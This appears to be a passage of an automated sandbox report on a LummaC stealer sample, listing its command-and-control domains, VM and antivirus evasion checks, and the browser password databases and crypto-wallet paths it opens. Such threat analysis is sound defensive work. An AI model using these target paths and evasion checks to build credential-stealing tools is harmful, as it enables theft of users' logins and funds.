                Source: ardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2542434664.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605522749.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2422011909.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2486324399.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632859717.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397173841.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2605680840.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543143805.00000000010B2000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2520849640.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.00000000010B6000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2423864178.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                Source: unknownHTTPS traffic detected: 178.62.201.34:443 -> 192.168.2.8:49712 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 45.77.249.79:443 -> 192.168.2.8:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.8:49714 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49716 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49717 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49719 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49720 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49721 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.8:49722 version: TLS 1.2
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_010659F80_3_010659F8
                Source: ardware-v1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@1/0@13/4
                Source: ardware-v1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\ardware-v1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: ardware-v1.exe, 00000000.00000003.2451716381.0000000003886000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428489732.0000000003874000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2429154844.0000000003855000.00000004.00000800.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451602272.0000000003893000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: ardware-v1.exeVirustotal: Detection: 20%
                Source: ardware-v1.exeReversingLabs: Detection: 23%
                Source: C:\Users\user\Desktop\ardware-v1.exeFile read: C:\Users\user\Desktop\ardware-v1.exeJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: ardware-v1.exeStatic PE information: certificate valid
                Source: ardware-v1.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: ardware-v1.exeStatic file information: File size 3487960 > 1048576
                Source: ardware-v1.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x312800
                Source: ardware-v1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: ardware-v1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: ardware-v1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: ardware-v1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: ardware-v1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: ardware-v1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: ardware-v1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: ardware-v1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: C:\Admin\Workspace\1191982842\Project\Release\Project.pdb source: ardware-v1.exe
                Source: ardware-v1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: ardware-v1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: ardware-v1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: ardware-v1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: ardware-v1.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_01057640 push eax; ret 0_3_01057646
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_01056C4C push eax; ret 0_3_01056C52
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_01089F12 push edx; ret 0_3_01089F31
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_0109004C push esi; retf 0_3_0109004F
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_01089ED2 push esi; ret 0_3_01089F11
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_01089CD2 push ss; ret 0_3_01089D11
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_010C3999 push edi; iretd 0_3_010C399A
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_010C3999 push edi; iretd 0_3_010C399A
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_010C0BB9 push ecx; iretd 0_3_010C0D7A
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_010C0BB9 push ecx; iretd 0_3_010C0D7A
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_010C1D50 push ebx; retf 0_3_010C1D62
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_010C1D50 push ebx; retf 0_3_010C1D62
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_010C3999 push edi; iretd 0_3_010C399A
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_010C3999 push edi; iretd 0_3_010C399A
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_010C1D50 push ebx; retf 0_3_010C1D62
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_010C1D50 push ebx; retf 0_3_010C1D62
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_010C0BB9 push ecx; iretd 0_3_010C0D7A
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_010C0BB9 push ecx; iretd 0_3_010C0D7A
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_01089F12 push edx; ret 0_3_01089F31
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_0109004C push esi; retf 0_3_0109004F
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_01089ED2 push esi; ret 0_3_01089F11
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_01089CD2 push ss; ret 0_3_01089D11
                Source: C:\Users\user\Desktop\ardware-v1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Query firmware table information (likely to detect VMs)
                Source: C:\Users\user\Desktop\ardware-v1.exeSystem information queried: FirmwareTableInformationJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_0108A0AC rdtsc 0_3_0108A0AC
                Source: C:\Users\user\Desktop\ardware-v1.exe TID: 7524Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: ardware-v1.exe, 00000000.00000003.2451270778.00000000038B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696494690p
                Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                Source: ardware-v1.exe, ardware-v1.exe, 00000000.00000002.2632519003.000000000100C000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2543143805.0000000001055000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2397173841.0000000001057000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2422011909.0000000001057000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517966266.0000000001055000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2521220683.0000000001055000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2517557532.0000000001055000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2428802821.0000000001057000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2426411706.0000000001057000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000003.2451084974.0000000001054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: ardware-v1.exe, 00000000.00000003.2451319374.00000000038AC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Users\user\Desktop\ardware-v1.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeCode function: 0_3_0108A0AC rdtsc 0_3_0108A0AC

                HIPS / PFW / Operating System Protection Evasion

                barindex
                LummaC encrypted strings found
                Source: ardware-v1.exe, 00000000.00000002.2631309954.0000000000440000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: debonairnukk.xyz
                Source: ardware-v1.exe, 00000000.00000002.2631309954.0000000000440000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: diffuculttan.xyz
                Source: ardware-v1.exe, 00000000.00000002.2631309954.0000000000440000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: effecterectz.xyz
                Source: ardware-v1.exe, 00000000.00000002.2631309954.0000000000440000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: deafeninggeh.biz
                Source: ardware-v1.exe, 00000000.00000002.2631309954.0000000000440000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: immureprech.biz
                Source: C:\Users\user\Desktop\ardware-v1.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: ardware-v1.exe, ardware-v1.exe, 00000000.00000003.2543143805.0000000001085000.00000004.00000020.00020000.00000000.sdmp, ardware-v1.exe, 00000000.00000002.2632519003.0000000001021000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\ardware-v1.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: ardware-v1.exe PID: 7748, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: ardware-v1.exeString found in binary or memory: Wallets/Electrum-LTC
                Source: ardware-v1.exeString found in binary or memory: Wallets/ElectronCash
                Source: ardware-v1.exeString found in binary or memory: window-state.json
                Source: ardware-v1.exeString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: ardware-v1.exe, 00000000.00000003.2484156377.00000000010B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                Source: ardware-v1.exeString found in binary or memory: Wallets/Exodus
                Source: ardware-v1.exeString found in binary or memory: %appdata%\Ethereum
                Source: ardware-v1.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: ardware-v1.exeString found in binary or memory: keystore
                Source: ardware-v1.exe, 00000000.00000003.2428802821.0000000001057000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\ardware-v1.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
